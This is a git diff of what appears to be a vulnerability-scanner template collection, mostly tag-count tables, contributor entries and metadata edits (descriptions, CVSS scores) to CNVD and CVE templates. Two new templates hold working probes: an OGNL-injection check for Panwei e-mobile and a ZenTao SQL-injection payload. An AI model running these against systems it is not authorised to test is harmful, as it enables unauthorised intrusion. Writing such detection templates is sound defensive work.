+| web3                 |     1 |                                     |       |                  |       |          |       |         |       |
+| kingdee              |     1 |                                     |       |                  |       |          |       |         |       |
+| hiboss               |     1 |                                     |       |                  |       |          |       |         |       |
+| fancyproduct         |     1 |                                     |       |                  |       |          |       |         |       |
+| lg-nas               |     1 |                                     |       |                  |       |          |       |         |       |
+| ocs-inventory        |     1 |                                     |       |                  |       |          |       |         |       |
+| addpac               |     1 |                                     |       |                  |       |          |       |         |       |
+| idemia               |     1 |                                     |       |                  |       |          |       |         |       |
+| fhem                 |     1 |                                     |       |                  |       |          |       |         |       |
+| thedogapi            |     1 |                                     |       |                  |       |          |       |         |       |
+| flowdash             |     1 |                                     |       |                  |       |          |       |         |       |
+| cnvd2022             |     1 |                                     |       |                  |       |          |       |         |       |
+| memcached            |     1 |                                     |       |                  |       |          |       |         |       |
+| anycomment           |     1 |                                     |       |                  |       |          |       |         |       |
+| smuggling            |     1 |                                     |       |                  |       |          |       |         |       |
+| emerson              |     1 |                                     |       |                  |       |          |       |         |       |
+| opencart             |     1 |                                     |       |                  |       |          |       |         |       |
+| gargoyle             |     1 |                                     |       |                  |       |          |       |         |       |
+| plone                |     1 |                                     |       |                  |       |          |       |         |       |
+| dbeaver              |     1 |                                     |       |                  |       |          |       |         |       |
+| rijksmuseum          |     1 |                                     |       |                  |       |          |       |         |       |
+| dlp                  |     1 |                                     |       |                  |       |          |       |         |       |
+| kindeditor           |     1 |                                     |       |                  |       |          |       |         |       |
+| pulsesecure          |     1 |                                     |       |                  |       |          |       |         |       |
+| zoomeye              |     1 |                                     |       |                  |       |          |       |         |       |
+| api2convert          |     1 |                                     |       |                  |       |          |       |         |       |
+| festivo              |     1 |                                     |       |                  |       |          |       |         |       |
+| sureline             |     1 |                                     |       |                  |       |          |       |         |       |
+| teradici             |     1 |                                     |       |                  |       |          |       |         |       |
+| google-earth         |     1 |                                     |       |                  |       |          |       |         |       |
+| dnssec               |     1 |                                     |       |                  |       |          |       |         |       |
+| web-dispatcher       |     1 |                                     |       |                  |       |          |       |         |       |
+| malwarebazaar        |     1 |                                     |       |                  |       |          |       |         |       |
+| fortigates           |     1 |                                     |       |                  |       |          |       |         |       |
+| babel                |     1 |                                     |       |                  |       |          |       |         |       |
+| revive               |     1 |                                     |       |                  |       |          |       |         |       |
+| emlog                |     1 |                                     |       |                  |       |          |       |         |       |
+| kodexplorer          |     1 |                                     |       |                  |       |          |       |         |       |
+| dir-615              |     1 |                                     |       |                  |       |          |       |         |       |
+| spartacus            |     1 |                                     |       |                  |       |          |       |         |       |
+| expressjs            |     1 |                                     |       |                  |       |          |       |         |       |
+| ncomputing           |     1 |                                     |       |                  |       |          |       |         |       |
+| playsms              |     1 |                                     |       |                  |       |          |       |         |       |
+| thinkadmin           |     1 |                                     |       |                  |       |          |       |         |       |
+| h2                   |     1 |                                     |       |                  |       |          |       |         |       |
+| lfw                  |     1 |                                     |       |                  |       |          |       |         |       |
+| gsoap                |     1 |                                     |       |                  |       |          |       |         |       |
+| jinfornet            |     1 |                                     |       |                  |       |          |       |         |       |
+| blackduck            |     1 |                                     |       |                  |       |          |       |         |       |
+| segment              |     1 |                                     |       |                  |       |          |       |         |       |
+| hdnetwork            |     1 |                                     |       |                  |       |          |       |         |       |
+| cofax                |     1 |                                     |       |                  |       |          |       |         |       |
+| nimsoft              |     1 |                                     |       |                  |       |          |       |         |       |
+| clockify             |     1 |                                     |       |                  |       |          |       |         |       |
+| 1forge               |     1 |                                     |       |                  |       |          |       |         |       |
+| credential           |     1 |                                     |       |                  |       |          |       |         |       |
+| yachtcontrol         |     1 |                                     |       |                  |       |          |       |         |       |
+| iframe               |     1 |                                     |       |                  |       |          |       |         |       |
+| unauthenticated      |     1 |                                     |       |                  |       |          |       |         |       |
+| themefusion          |     1 |                                     |       |                  |       |          |       |         |       |
+| manager              |     1 |                                     |       |                  |       |          |       |         |       |
+| razer                |     1 |                                     |       |                  |       |          |       |         |       |
+| keenetic             |     1 |                                     |       |                  |       |          |       |         |       |
+| extractor            |     1 |                                     |       |                  |       |          |       |         |       |
+| phpminiadmin         |     1 |                                     |       |                  |       |          |       |         |       |
+| issabel              |     1 |                                     |       |                  |       |          |       |         |       |
+| wordcloud            |     1 |                                     |       |                  |       |          |       |         |       |
+| noptin               |     1 |                                     |       |                  |       |          |       |         |       |
+| spiderfoot           |     1 |                                     |       |                  |       |          |       |         |       |
+| curcy                |     1 |                                     |       |                  |       |          |       |         |       |
+| strava               |     1 |                                     |       |                  |       |          |       |         |       |
+| 3com                 |     1 |                                     |       |                  |       |          |       |         |       |
+| b2evolution          |     1 |                                     |       |                  |       |          |       |         |       |
+| cloudconvert         |     1 |                                     |       |                  |       |          |       |         |       |
+| api-manager          |     1 |                                     |       |                  |       |          |       |         |       |
+| mediacloud           |     1 |                                     |       |                  |       |          |       |         |       |
+| kenesto              |     1 |                                     |       |                  |       |          |       |         |       |
+| vault                |     1 |                                     |       |                  |       |          |       |         |       |
+| iplanet              |     1 |                                     |       |                  |       |          |       |         |       |
+| commvault            |     1 |                                     |       |                  |       |          |       |         |       |
+| discourse            |     1 |                                     |       |                  |       |          |       |         |       |
+| synnefo              |     1 |                                     |       |                  |       |          |       |         |       |
+| radius               |     1 |                                     |       |                  |       |          |       |         |       |
+| bravenewcoin         |     1 |                                     |       |                  |       |          |       |         |       |
+| currencyscoop        |     1 |                                     |       |                  |       |          |       |         |       |
+| powertek             |     1 |                                     |       |                  |       |          |       |         |       |
+| zap                  |     1 |                                     |       |                  |       |          |       |         |       |
+| primefaces           |     1 |                                     |       |                  |       |          |       |         |       |
+| billquick            |     1 |                                     |       |                  |       |          |       |         |       |
+| zenrows              |     1 |                                     |       |                  |       |          |       |         |       |
+| email                |     1 |                                     |       |                  |       |          |       |         |       |
+| wiki                 |     1 |                                     |       |                  |       |          |       |         |       |
+| mspcontrol           |     1 |                                     |       |                  |       |          |       |         |       |
+| pods                 |     1 |                                     |       |                  |       |          |       |         |       |
+| phpsec               |     1 |                                     |       |                  |       |          |       |         |       |
+| clearbit             |     1 |                                     |       |                  |       |          |       |         |       |
+| sonarcloud           |     1 |                                     |       |                  |       |          |       |         |       |
+| secnet-ac            |     1 |                                     |       |                  |       |          |       |         |       |
+| ignition             |     1 |                                     |       |                  |       |          |       |         |       |
+| jsapi                |     1 |                                     |       |                  |       |          |       |         |       |
+| analytify            |     1 |                                     |       |                  |       |          |       |         |       |
+| geolocation          |     1 |                                     |       |                  |       |          |       |         |       |
+| commscope            |     1 |                                     |       |                  |       |          |       |         |       |
+| totolink             |     1 |                                     |       |                  |       |          |       |         |       |
+| zuul                 |     1 |                                     |       |                  |       |          |       |         |       |
+| appweb               |     1 |                                     |       |                  |       |          |       |         |       |
+| scs                  |     1 |                                     |       |                  |       |          |       |         |       |
+| jenkin               |     1 |                                     |       |                  |       |          |       |         |       |
+| hostio               |     1 |                                     |       |                  |       |          |       |         |       |
+| geutebruck           |     1 |                                     |       |                  |       |          |       |         |       |
+| trane                |     1 |                                     |       |                  |       |          |       |         |       |
+| termtalk             |     1 |                                     |       |                  |       |          |       |         |       |
+| mantis               |     1 |                                     |       |                  |       |          |       |         |       |
+| sympa                |     1 |                                     |       |                  |       |          |       |         |       |
+| orbintelligence      |     1 |                                     |       |                  |       |          |       |         |       |
+| markdown             |     1 |                                     |       |                  |       |          |       |         |       |
+| floc                 |     1 |                                     |       |                  |       |          |       |         |       |
+| hetzner              |     1 |                                     |       |                  |       |          |       |         |       |
+| fastapi              |     1 |                                     |       |                  |       |          |       |         |       |
+| chronoforums         |     1 |                                     |       |                  |       |          |       |         |       |
+| dicoogle             |     1 |                                     |       |                  |       |          |       |         |       |
+| netbiblio            |     1 |                                     |       |                  |       |          |       |         |       |
+| kerbynet             |     1 |                                     |       |                  |       |          |       |         |       |
+| find                 |     1 |                                     |       |                  |       |          |       |         |       |
+| processmaker         |     1 |                                     |       |                  |       |          |       |         |       |
+| fortressaircraft     |     1 |                                     |       |                  |       |          |       |         |       |
+| opencti              |     1 |                                     |       |                  |       |          |       |         |       |
+| cse                  |     1 |                                     |       |                  |       |          |       |         |       |
+| coinapi              |     1 |                                     |       |                  |       |          |       |         |       |
+| acexy                |     1 |                                     |       |                  |       |          |       |         |       |
+| nvrmini              |     1 |                                     |       |                  |       |          |       |         |       |
+| nifi                 |     1 |                                     |       |                  |       |          |       |         |       |
+| hanwang              |     1 |                                     |       |                  |       |          |       |         |       |
+| alerta               |     1 |                                     |       |                  |       |          |       |         |       |
+| xyxel                |     1 |                                     |       |                  |       |          |       |         |       |
+| cve2004              |     1 |                                     |       |                  |       |          |       |         |       |
+| default-page         |     1 |                                     |       |                  |       |          |       |         |       |
+| c99                  |     1 |                                     |       |                  |       |          |       |         |       |
+| screenshotapi        |     1 |                                     |       |                  |       |          |       |         |       |
+| redcap               |     1 |                                     |       |                  |       |          |       |         |       |
+| msmtp                |     1 |                                     |       |                  |       |          |       |         |       |
+| mobile               |     1 |                                     |       |                  |       |          |       |         |       |
+| behat                |     1 |                                     |       |                  |       |          |       |         |       |
+| bitbucket            |     1 |                                     |       |                  |       |          |       |         |       |
+| qualcomm             |     1 |                                     |       |                  |       |          |       |         |       |
+| thecatapi            |     1 |                                     |       |                  |       |          |       |         |       |
+| currencyfreaks       |     1 |                                     |       |                  |       |          |       |         |       |
+| jupyterhub           |     1 |                                     |       |                  |       |          |       |         |       |
+| monitorix            |     1 |                                     |       |                  |       |          |       |         |       |
+| spotify              |     1 |                                     |       |                  |       |          |       |         |       |
+| spectracom           |     1 |                                     |       |                  |       |          |       |         |       |
+| videoxpert           |     1 |                                     |       |                  |       |          |       |         |       |
+| m-files              |     1 |                                     |       |                  |       |          |       |         |       |
+| wago                 |     1 |                                     |       |                  |       |          |       |         |       |
+| drive                |     1 |                                     |       |                  |       |          |       |         |       |
+| sv3c                 |     1 |                                     |       |                  |       |          |       |         |       |
+| intelbras            |     1 |                                     |       |                  |       |          |       |         |       |
+| incapptic-connect    |     1 |                                     |       |                  |       |          |       |         |       |
+| trilithic            |     1 |                                     |       |                  |       |          |       |         |       |
+| prototype            |     1 |                                     |       |                  |       |          |       |         |       |
+| cve2000              |     1 |                                     |       |                  |       |          |       |         |       |
+| optimizely           |     1 |                                     |       |                  |       |          |       |         |       |
+| krweb                |     1 |                                     |       |                  |       |          |       |         |       |
+| jaspersoft           |     1 |                                     |       |                  |       |          |       |         |       |
+| alumni               |     1 |                                     |       |                  |       |          |       |         |       |
+| mx                   |     1 |                                     |       |                  |       |          |       |         |       |
+| mi                   |     1 |                                     |       |                  |       |          |       |         |       |
+| calendarix           |     1 |                                     |       |                  |       |          |       |         |       |
+| awin                 |     1 |                                     |       |                  |       |          |       |         |       |
+| speed                |     1 |                                     |       |                  |       |          |       |         |       |
+| axiom                |     1 |                                     |       |                  |       |          |       |         |       |
+| expose               |     1 |                                     |       |                  |       |          |       |         |       |
+| webftp               |     1 |                                     |       |                  |       |          |       |         |       |
+| razor                |     1 |                                     |       |                  |       |          |       |         |       |
+| stored               |     1 |                                     |       |                  |       |          |       |         |       |
+| groupoffice          |     1 |                                     |       |                  |       |          |       |         |       |
+| rmi                  |     1 |                                     |       |                  |       |          |       |         |       |
+| placeos              |     1 |                                     |       |                  |       |          |       |         |       |
+| defi                 |     1 |                                     |       |                  |       |          |       |         |       |
+| onlinefarm           |     1 |                                     |       |                  |       |          |       |         |       |
+| opensearch           |     1 |                                     |       |                  |       |          |       |         |       |
+| taiga                |     1 |                                     |       |                  |       |          |       |         |       |
+| diris                |     1 |                                     |       |                  |       |          |       |         |       |
+| twitter-server       |     1 |                                     |       |                  |       |          |       |         |       |
+| pyproject            |     1 |                                     |       |                  |       |          |       |         |       |
+| synapse              |     1 |                                     |       |                  |       |          |       |         |       |
+| simplecrm            |     1 |                                     |       |                  |       |          |       |         |       |
+| mrtg                 |     1 |                                     |       |                  |       |          |       |         |       |
+| jumpcloud            |     1 |                                     |       |                  |       |          |       |         |       |
+| strider              |     1 |                                     |       |                  |       |          |       |         |       |
+| workreap             |     1 |                                     |       |                  |       |          |       |         |       |
+| surreal              |     1 |                                     |       |                  |       |          |       |         |       |
+| loganalyzer          |     1 |                                     |       |                  |       |          |       |         |       |
+| reprise              |     1 |                                     |       |                  |       |          |       |         |       |
+| camunda              |     1 |                                     |       |                  |       |          |       |         |       |
+| bitquery             |     1 |                                     |       |                  |       |          |       |         |       |
+| autocomplete         |     1 |                                     |       |                  |       |          |       |         |       |
diff --git a/TOP-10.md b/TOP-10.md
index 98ed1f88da..8117810855 100644
--- a/TOP-10.md
+++ b/TOP-10.md
@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1156 | daffainfo     |   560 | cves             |  1160 | info     |  1192 | http    |  3187 |
-| panel     |   515 | dhiyaneshdk   |   421 | exposed-panels   |   523 | high     |   874 | file    |    68 |
-| lfi       |   461 | pikpikcu      |   316 | vulnerabilities  |   452 | medium   |   662 | network |    50 |
-| xss       |   367 | pdteam        |   262 | technologies     |   255 | critical |   414 | dns     |    17 |
-| wordpress |   364 | geeknik       |   179 | exposures        |   204 | low      |   183 |         |       |
-| exposure  |   293 | dwisiswant0   |   168 | misconfiguration |   197 | unknown  |     6 |         |       |
-| rce       |   291 | princechaddha |   133 | workflows        |   186 |          |       |         |       |
-| cve2021   |   283 | 0x_akoko      |   130 | token-spray      |   154 |          |       |         |       |
-| tech      |   271 | gy741         |   118 | default-logins   |    95 |          |       |         |       |
-| wp-plugin |   264 | pussycat0x    |   116 | file             |    68 |          |       |         |       |
+| cve       |  1430 | daffainfo     |   631 | cves             |  1407 | info     |  1474 | http    |  3858 |
+| panel     |   655 | dhiyaneshdk   |   584 | exposed-panels   |   662 | high     |  1009 | file    |    76 |
+| edb       |   563 | pikpikcu      |   329 | vulnerabilities  |   509 | medium   |   818 | network |    51 |
+| lfi       |   509 | pdteam        |   269 | technologies     |   282 | critical |   478 | dns     |    17 |
+| xss       |   491 | geeknik       |   187 | exposures        |   275 | low      |   225 |         |       |
+| wordpress |   419 | dwisiswant0   |   169 | misconfiguration |   237 | unknown  |    11 |         |       |
+| exposure  |   407 | 0x_akoko      |   165 | token-spray      |   230 |          |       |         |       |
+| cve2021   |   352 | princechaddha |   151 | workflows        |   189 |          |       |         |       |
+| rce       |   337 | ritikchaddha  |   137 | default-logins   |   103 |          |       |         |       |
+| wp-plugin |   316 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
diff --git a/cnvd/2017/CNVD-2017-03561.yaml b/cnvd/2017/CNVD-2017-03561.yaml
new file mode 100644
index 0000000000..efd58260a4
--- /dev/null
+++ b/cnvd/2017/CNVD-2017-03561.yaml
@@ -0,0 +1,34 @@
+id: CNVD-2017-03561
+
+info:
+  name: Panwei e-mobile - Ognl Injection
+  author: ritikchaddha
+  severity: high
+  reference:
+    - https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
+  metadata:
+    verified: true
+    fofa-query: app="泛微-eMobile"
+  tags: cnvd,cnvd2017,emobile,ognl,panwei
+
+variables:
+  num1: "9999"
+  num2: "5555"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
+      - "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '55544445'
+
+      - type: status
+        status:
+          - 200
diff --git a/cnvd/2018/CNVD-2018-13393.yaml b/cnvd/2018/CNVD-2018-13393.yaml
index 0cce50c757..f215ee7764 100644
--- a/cnvd/2018/CNVD-2018-13393.yaml
+++ b/cnvd/2018/CNVD-2018-13393.yaml
@@ -1,11 +1,16 @@
 id: CNVD-2018-13393
 
 info:
-  name: Metinfo LFI
+  name: Metinfo - Local File Inclusion
   author: ritikchaddha
   severity: high
+  description: Metinfo is susceptible to local file inclusion.
   reference:
     - https://paper.seebug.org/676/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-22
   tags: metinfo,cnvd,cvnd2018,lfi
 
 requests:
@@ -23,3 +28,5 @@ requests:
           - "<?php"
           - "login_met_cookie($metinfo_admin_name);"
         condition: and
+
+# Enhanced by mp on 2022/07/05
diff --git a/cnvd/2020/CNVD-2020-23735.yaml b/cnvd/2020/CNVD-2020-23735.yaml
index 2a5823431c..9e16be213b 100644
--- a/cnvd/2020/CNVD-2020-23735.yaml
+++ b/cnvd/2020/CNVD-2020-23735.yaml
@@ -1,12 +1,16 @@
 id: CNVD-2020-23735
 
 info:
-  name: Xxunchi Local File read
+  name: Xxunchi CMS - Local File Inclusion
   author: princechaddha
-  severity: medium
-  description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
+  severity: high
+  description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
   reference:
     - https://www.cnvd.org.cn/flaw/show/2025171
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: xunchi,lfi,cnvd,cnvd2020
 
 requests:
@@ -26,3 +30,5 @@ requests:
           - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
           - "display_errors"
         condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/cnvd/2020/CNVD-2020-46552.yaml b/cnvd/2020/CNVD-2020-46552.yaml
index 690f94e80f..50deaab6ac 100644
--- a/cnvd/2020/CNVD-2020-46552.yaml
+++ b/cnvd/2020/CNVD-2020-46552.yaml
@@ -1,13 +1,18 @@
 id: CNVD-2020-46552
+
 info:
-  name: Sangfor EDR Tool - Remote Code Execution
+  name: Sangfor EDR - Remote Code Execution
   author: ritikchaddha
   severity: critical
-  description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
+  description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
   reference:
     - https://www.modb.pro/db/144475
     - https://blog.csdn.net/bigblue00/article/details/108434009
     - https://cn-sec.com/archives/721509.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: cnvd,cnvd2020,sangfor,rce
 
 requests:
@@ -23,3 +28,5 @@ requests:
           - 'contains(body, "Log Helper")'
           - 'status_code == 200'
         condition: and
+
+# Enhanced by mp on 2022/05/18
diff --git a/cnvd/2020/CNVD-2020-62422.yaml b/cnvd/2020/CNVD-2020-62422.yaml
index 0194c6d8b8..c3716dfdb0 100644
--- a/cnvd/2020/CNVD-2020-62422.yaml
+++ b/cnvd/2020/CNVD-2020-62422.yaml
@@ -1,9 +1,10 @@
 id: CNVD-2020-62422
 
 info:
-  name: Seeyon - Arbitrary File Retrieval
+  name: Seeyon - Local File Inclusion
   author: pikpikcu
   severity: medium
+  description: Seeyon is vulnerable to local file inclusion.
   reference:
     - https://blog.csdn.net/m0_46257936/article/details/113150699
   tags: lfi,cnvd,cnvd2020,seeyon
@@ -30,3 +31,5 @@ requests:
         words:
           - "ctpDataSource.password"
         condition: and
+
+# Enhanced by mp on 2022/07/22
diff --git a/cnvd/2020/CNVD-2020-67113.yaml b/cnvd/2020/CNVD-2020-67113.yaml
index 547b8d305b..50b695df57 100644
--- a/cnvd/2020/CNVD-2020-67113.yaml
+++ b/cnvd/2020/CNVD-2020-67113.yaml
@@ -1,15 +1,20 @@
 id: CNVD-2020-67113
 
 info:
-  name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113)
+  name: H5S CONSOLE - Unauthorized Access
   author: ritikchaddha
-  severity: high
-  description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability
+  severity: medium
+  description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
   reference:
     - https://vul.wangan.com/a/CNVD-2020-67113
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-425
   metadata:
+    verified: true
     shodan-query: http.title:"H5S CONSOLE"
-  tags: h5s,unauth,h5sconsole,cnvd,cnvd2020
+  tags: cnvd,cnvd2020,h5s,unauth,h5sconsole
 
 requests:
   - method: GET
@@ -42,3 +47,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cnvd/2021/CNVD-2021-01931.yaml b/cnvd/2021/CNVD-2021-01931.yaml
index af7aa8ed08..b1bd600a6f 100644
--- a/cnvd/2021/CNVD-2021-01931.yaml
+++ b/cnvd/2021/CNVD-2021-01931.yaml
@@ -1,12 +1,17 @@
 id: CNVD-2021-01931
 
 info:
-  name: Ruoyi Management System - Arbitrary File Retrieval
+  name: Ruoyi Management System - Local File Inclusion
   author: daffainfo,ritikchaddha
   severity: high
+  description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
   reference:
     - https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
   tags: ruoyi,lfi,cnvd,cnvd2021
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-22
 
 requests:
   - method: GET
@@ -28,3 +33,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by cs on 06/03/2022
diff --git a/cnvd/2021/CNVD-2021-10543.yaml b/cnvd/2021/CNVD-2021-10543.yaml
index 8a4354683a..2ff27e9afd 100644
--- a/cnvd/2021/CNVD-2021-10543.yaml
+++ b/cnvd/2021/CNVD-2021-10543.yaml
@@ -1,11 +1,16 @@
 id: CNVD-2021-10543
 
 info:
-  name: EEA Information Disclosure
+  name: EEA - Information Disclosure
   author: pikpikcu
   severity: high
+  description: EEA is susceptible to information disclosure.
   reference:
     - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cwe-id: CWE-200
   tags: config,exposure,cnvd,cnvd2021
 
 requests:
@@ -24,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/05
diff --git a/cnvd/2021/CNVD-2021-28277.yaml b/cnvd/2021/CNVD-2021-28277.yaml
index 1277253402..a30f135e9f 100644
--- a/cnvd/2021/CNVD-2021-28277.yaml
+++ b/cnvd/2021/CNVD-2021-28277.yaml
@@ -1,14 +1,19 @@
 id: CNVD-2021-28277
 
 info:
-  name: Landray-OA Arbitrary - Arbitrary File Retrieval
+  name: Landray-OA - Local File Inclusion
   author: pikpikcu,daffainfo
   severity: high
+  description: Landray-OA is susceptible to local file inclusion.
   reference:
     - https://www.aisoutu.com/a/1432457
     - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
   metadata:
     fofa-query: app="Landray OA system"
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-22
   tags: landray,lfi,cnvd,cnvd2021
 
 requests:
@@ -42,3 +47,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cnvd/2021/CNVD-2021-30167.yaml b/cnvd/2021/CNVD-2021-30167.yaml
index d3ef8cc275..393622560e 100644
--- a/cnvd/2021/CNVD-2021-30167.yaml
+++ b/cnvd/2021/CNVD-2021-30167.yaml
@@ -1,13 +1,19 @@
 id: CNVD-2021-30167
 
 info:
-  name: UFIDA NC BeanShell Remote Code Execution
+  name: UFIDA NC BeanShell Remote Command Execution
   author: pikpikcu
-  severity: high
+  severity: critical
+  description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
   reference:
     - https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
     - https://www.cnvd.org.cn/webinfo/show/6491
-  tags: beanshell,rce,cnvd,cnvd2021,yonyou
+    - https://chowdera.com/2022/03/202203110138271510.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: cnvd,cnvd2021,beanshell,rce,yonyou
 
 requests:
   - raw:
@@ -40,3 +46,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/07/05
diff --git a/cnvd/2021/CNVD-2021-49104.yaml b/cnvd/2021/CNVD-2021-49104.yaml
index 125c446080..7f24b1b41c 100644
--- a/cnvd/2021/CNVD-2021-49104.yaml
+++ b/cnvd/2021/CNVD-2021-49104.yaml
@@ -13,7 +13,7 @@ info:
     cvss-score: 9.9
     cwe-id: CWE-434
   remediation: Pan Wei has released an update to resolve this vulnerability.
-  tags: pan,micro,cnvd,cnvd2021
+  tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
 
 requests:
   - raw:
diff --git a/cnvd/2022/CNVD-2022-42853.yaml b/cnvd/2022/CNVD-2022-42853.yaml
new file mode 100644
index 0000000000..76423cf563
--- /dev/null
+++ b/cnvd/2022/CNVD-2022-42853.yaml
@@ -0,0 +1,35 @@
+id: CNVD-2022-42853
+
+info:
+  name: ZenTao CMS - SQL Injection
+  author: ling
+  severity: high
+  description: |
+    Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
+  reference:
+    - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
+  metadata:
+    verified: true
+    shodan-query: http.title:"zentao"
+    fofa-query: "Zentao"
+  tags: cnvd,cnvd2022,zentao,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /zentao/user-login.html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{BaseURL}}/zentao/user-login.html
+
+        account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'c8c605999f3d8352d7bb792cf3fdb25'
diff --git a/contributors.json b/contributors.json
index 57dfa18e1b..8611e5cf4c 100644
--- a/contributors.json
+++ b/contributors.json
@@ -9,6 +9,26 @@
             "email": ""
         }
     },
+    {
+        "author": "0x08",
+        "links": {
+            "github": "https://github.com/its0x08",
+            "twitter": "",
+            "linkedin": "",
+            "website": "",
+            "email": ""
+        }
+    },
+    {
+        "author": "Dhiyaneshwaran",
+        "links": {
+            "github": "https://github.com/DhiyaneshGeek",
+            "twitter": "https://twitter.com/DhiyaneshDK",
+            "linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-b-27947a131/",
+            "website": "https://dhiyaneshgeek.github.io/",
+            "email": ""
+        }
+    },
     {
         "author": "duty_1g",
         "links": {
@@ -1349,4 +1369,4 @@
             "email": ""
         }
     }
-]
\ No newline at end of file
+]
diff --git a/cves/2000/CVE-2000-0114.yaml b/cves/2000/CVE-2000-0114.yaml
index 0050d0c90c..ecff9b7b80 100644
--- a/cves/2000/CVE-2000-0114.yaml
+++ b/cves/2000/CVE-2000-0114.yaml
@@ -11,7 +11,7 @@ info:
   classification:
     cve-id: CVE-2000-0114
   remediation: Upgrade to the latest version.
-  tags: cve,cve2000,frontpage,microsoft
+  tags: cve,cve2000,frontpage,microsoft,edb
 
 requests:
   - method: GET
diff --git a/cves/2002/CVE-2002-1131.yaml b/cves/2002/CVE-2002-1131.yaml
index d82da011f8..3925b3ad70 100644
--- a/cves/2002/CVE-2002-1131.yaml
+++ b/cves/2002/CVE-2002-1131.yaml
@@ -1,15 +1,21 @@
 id: CVE-2002-1131
 
 info:
-  name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
+  name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
-  description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
   reference:
+    - http://www.redhat.com/support/errata/RHSA-2002-204.html
+    - http://www.debian.org/security/2002/dsa-191
